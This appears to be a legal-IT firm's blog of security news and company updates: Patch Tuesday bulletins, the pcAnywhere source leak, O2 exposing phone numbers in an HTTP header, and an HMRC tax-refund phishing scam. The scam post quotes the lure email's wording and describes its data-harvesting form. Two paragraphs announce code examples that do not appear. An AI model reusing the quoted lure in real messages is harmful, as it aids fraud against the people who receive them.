Welcome!

Hello and welcome to SproutIT’s Blog.

Please use the menu tabs, above, to navigate – you will find information posted here that is relevant and useful to the LegalIT market, as well as white papers that address specific LegalIT challenges, along with Sprout company updates.

Patch Tuesday! Do you care?

CJSM and TSOL, to name but two, require you to have centrally managed updates for Windows, across your whole organisation. Microsoft release critical updates every second Tuesday of the month, known as Patch Tuesday.

Do you take note of these – does your IT dept make sure your servers and workstations are up-to-date? If not, they should be!

• Security updates or critical updates protect against vulnerabilities to malware and security exploits. Other updates correct errors that aren’t related to security, or enhance functionality.

• Security updates are routinely provided (by Microsoft) on the second Tuesday of each month, Patch Tuesday, but can also be provided whenever a new update is urgently required to prevent a newly discovered or prevalent exploit targeting Windows users.

This is the first time I recall seeing Windows XP have fewer fixes released than Windows 7. Will this be a new pattern going forward?

Microsoft considers four of these critical and SophosLabs agrees, assigning MS12-016, MS12-013, MS12-010 and MS12-008 a high rating.

MS12-008 is a kernel driver vulnerability that could lead to remote code execution, MS12-010 is a remote execution flaw in all versions of Internet Explorer, MS12-013 is a remote code execution vulnerability in the C run-time on Windows 7/Vista/2008 and MS12-016 is a remote code execution vulnerability in Silverlight and the .NET framework.

Microsoft rated the remaining five as Important. SophosLabs agrees with two of these ratings, MS12-009 and MS12-011, but considers MS12-015 to be medium and MS12-012 and MS12-014 to be high risk.

MS12-015 is a remote code execution in Visio Viewer that is triggered by a malicious Visio file, MS12-012 could allow remote code execution when opening a .icc (color profile) file on Windows 2008 and MS12-014 could allow an attacker to remotely execute code by tricking a user into loading a media file on Windows XP SP3.

As always the best practice is to apply all of these as soon as possible.

Source – Sophos Blog

Mac FileVault 2's full disk encryption can be broken in less than 40 minutes & TrueCrypt

California-based forensics software vendor Passware has released the latest version of its toolkit, which the company claims can bypass Apple’s FileVault 2 disk encryption “in minutes,” as well as volumes encrypted with TrueCrypt.

Data Security Seminar – great success

Our breakfast seminar on data security and some straightforward solutions went ahead this morning. It was very well attended, and the overwhelming feedback was that the presenters, the quality of the seminar and its content were excellent.

Presentations from Sprout Director, Danny Killeen, Mimecast’s Eliza Hedegaard and Vigilante Bespoke’s Oliver Crofton discussed the common issues we face regarding data security and, crucially, simple and effective ways of addressing them.

If you would like information on the content of the seminar, details of future events or further information on any of the speakers, please do get in touch – contact details are on our website.

Quadrant Chambers - Tim Gerrard

Symantec – pcAnywhere is now a RISK. DATA LEAK

As reported by Sophos and by Symantec itself, the blueprints for current versions of Symantec's pcAnywhere software were stolen in 2006; all users are at risk of attack and should pull the plug.

Here’s what the security firm had to say about the pcAnywhere-specific risks, as paraphrased from its white paper:

• The encoding and encryption elements within pcAnywhere are vulnerable, making users susceptible to man-in-the-middle attacks, depending on the configuration and use of the product. If a man-in-the-middle attack should occur, the malicious user could steal session data or credentials.

• A secondary risk: If a malicious user obtains the cryptographic key, they can launch unauthorized remote control sessions and thus access systems and sensitive data.

• If the cryptographic key itself is using Active Directory credentials, it is also possible for attackers to perpetrate other malicious activities on the network.

• In an internal pcAnywhere environment, if a network sniffer was in place on a customer’s internal network and the attacker had access to the encryption details, the pcAnywhere traffic could be intercepted and decoded. This implies that a customer either has a malicious insider who planted the network sniffer or has an unknown Botnet operating in their environment. As always, security best practices are encouraged to mitigate this risk.

• Since pcAnywhere exchanges user login credentials, the risk exists that a network sniffer or Botnet could intercept this exchange of information, though it would still be difficult to actually interpret the data even if the pcAnywhere source code is released.

• For environments with remote users, this credential exchange introduces an additional level of exposure to external attacks.

Here’s another data breach that has taken a long time to come into the public domain. Who suppressed that information – the hackers, or Symantec? Time will tell but, for now, you have been warned.

Symantec

Is your smartphone telling every website you visit your telephone number? DATA LEAK…..

As reported by Sophos today, O2 mobile users in the UK are venting on Twitter, fuming at their discovery that their phone number is being shared with every website that they visit over the network.

I found a colleague who owns an iPhone on the O2 network, and we tried it out for ourselves. Making sure we turned off his WiFi connection, we used the O2 mobile network to access the web.

iPhone Test

Sure enough, his mobile number was being secretly communicated to websites he visited, embedded inside an HTTP header called HTTP_X_UP_CALLING_LINE_ID.

If your response is green then you are OK – if it’s red, you may not be too happy.
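A small green/red check of this kind can be written as a WSGI handler, shown here as an added example (not Sophos's or O2's code). WSGI exposes request headers under the same `HTTP_`-prefixed names quoted above, so the handler looks that key up directly; the function names and the sample number are constructed for illustration.

```python
import re

# Header name from the article, in the CGI/WSGI form the server sees it.
LEAK_KEY = "HTTP_X_UP_CALLING_LINE_ID"

def mask(number):
    """Keep only the last three digits so the page never echoes the full number."""
    digits = re.sub(r"\D", "", number)
    return "*" * max(len(digits) - 3, 0) + digits[-3:]

def check_environ(environ):
    """Return (verdict, detail) for one request's WSGI environ."""
    value = environ.get(LEAK_KEY, "").strip()
    if not value:
        return "green", "no calling-line-id header received"
    return "red", "network added a calling-line-id header: " + mask(value)

def app(environ, start_response):
    """WSGI entry point: answer every request with the verdict as plain text."""
    verdict, detail = check_environ(environ)
    body = (verdict + ": " + detail + "\n").encode("utf-8")
    start_response("200 OK", [("Content-Type", "text/plain; charset=utf-8"),
                              ("Cache-Control", "no-store")])
    return [body]

if __name__ == "__main__":
    # Constructed environs; 07700 900xxx is a reserved fictional UK number range.
    print(check_environ({LEAK_KEY: "447700900123"}))
    print(check_environ({}))
```

Because the header is inserted in transit, a check like this only tells you something when the page is fetched over plain HTTP on the mobile network, with WiFi off as in the test above.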

O2's response so far is to tell concerned Twitter users that it is investigating the issue.

There are reports that O2 are scrambling to fix this today – we shall see. There are also reports that this was first reported in the press TWO YEARS AGO……

And you thought your mobile browsing was private………!? All those advertising SMS messages are not so surprising now, I guess.

Seminar – Data Security Compliance

Data Security Compliance – Seminar
Friday 27 January, 8.30 – 10.00 AM

Our seminar next Friday only has a few places left; there will be an excellent crowd of professionals from various chambers and a great chance to network with others in your sector too…..

Please join us at our complimentary breakfast seminar. Practice Managers, CEOs and Senior Clerks are likely to be aware of the new and increasing data security demands. This seminar will address those demands and demonstrate how it is easy, straightforward and inexpensive to achieve compliance along with minimal overheads.

Sign up here to secure your place: http://www.sproutit.co.uk/events/

Recruiting! IT Procurement & Administration….

• You will be responsible for all IT procurement for our growing client base using automated quotation and online quote approval systems.

• You will be responsible for turning approved quotes into orders through our four primary suppliers and scheduling delivery and feedback to the business and client as to delivery dates. You will work with the ServiceDesk Supervisor and Service Delivery Manager to ensure speedy install/provisioning of purchased equipment.

If you think you can help a growing and dynamic IT Company based in Fleet Street, Central London, delivering premium IT management services to the Legal Sector, click below.

www.sproutit.co.uk/about_us/work_for_us

New ServiceDesk Team Leader and ServiceDesk Analyst!

We are very pleased to announce that we have recruited internally for this critical new position – ServiceDesk Team Leader.

Sprout’s ServiceDesk is an integral part of our outstanding service delivery and, with our growing portfolio of clients, we are acting to ensure our service levels remain of the highest standard.

Brendan Martindale holds a Bachelor’s Degree in Information Technology and has service delivery experience from previous employment in New Zealand.

In other recruitment news, Brendan’s team will be further bolstered by the new appointment of Chris Rabbatts who joins in the next few weeks as a ServiceDesk Analyst.

Both appointments demonstrate Sprout’s unwavering determination to deliver the highest possible level of service to all of our clients.

HMRC Scam – make sure you’re protected…

Emails are currently circulating that purport to be sent by the UK tax organization HM Revenue & Customs (HMRC). These e-mails claim that the recipient is eligible to receive a tax refund and that he or she must download an attached file and open it in a browser.

Ensure you have adequate email protection – is there any reason not to use a product that boasts 100% uptime, 99% spam blocking accuracy and a 100% virus record?

The scam e-mail reads in part:

TAX REFUND NOTIFICATION

Dear Taxpayer,

After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of 223.56 GBP.

Please submit the tax refund request and allow us 6-9 days in order to process it.

To access your tax refund, please follow the steps below:

- download the Tax Refund Form attached to this email

- open it in a browser

- follow the instructions on your screen

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.

Opening the attached file displays a form which prompts the victim to fill in his or her full name, date of birth, complete address, phone number, and credit card or debit card information.

Of course, submitting the form won’t actually send the information to HMRC; it will instead be sent to a malicious third party without the victim’s knowledge or approval.
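One way a mail gateway or an analyst could flag this pattern, as an added example that is not from Sophos or HMRC: it looks for an HTML attachment containing a form that asks for personal or card data, and reports where that form posts. The keyword list, function names, sample message and `collector.example` host are constructed for illustration.

```python
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse

SENSITIVE = ("card", "cvv", "birth", "dob", "address", "phone")  # assumed keyword list

class FormScan(HTMLParser):
    """Collect form action URLs and the names of the fields the form asks for."""
    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag in ("input", "select", "textarea"):
            self.fields.append((a.get("name") or "").lower())

def scan_message(raw):
    """Return one finding per HTML attachment holding a form that requests personal data."""
    findings = []
    for part in message_from_string(raw).walk():
        # Only HTML parts sent as a named attachment, as in the scam described above.
        if part.get_content_type() != "text/html" or not part.get_filename():
            continue
        scan = FormScan()
        scan.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        asked = sorted({k for f in scan.fields for k in SENSITIVE if k in f})
        if scan.actions and asked:
            hosts = sorted({urlparse(x).hostname or "(relative)" for x in scan.actions})
            findings.append({"file": part.get_filename(), "posts_to": hosts, "asks_for": asked})
    return findings

# Constructed sample message; collector.example is a placeholder host.
SAMPLE = '''From: "HMRC" <refunds@mail.example>
Subject: TAX REFUND NOTIFICATION
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; name="Tax_Refund_Form.html"
Content-Disposition: attachment; filename="Tax_Refund_Form.html"

<form action="http://collector.example/submit.php" method="post">
<input name="full_name"><input name="date_of_birth"><input name="card_number"><input name="cvv"></form>
--b1--
'''

if __name__ == "__main__":
    print(scan_message(SAMPLE))
```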

Source: www.sophos.com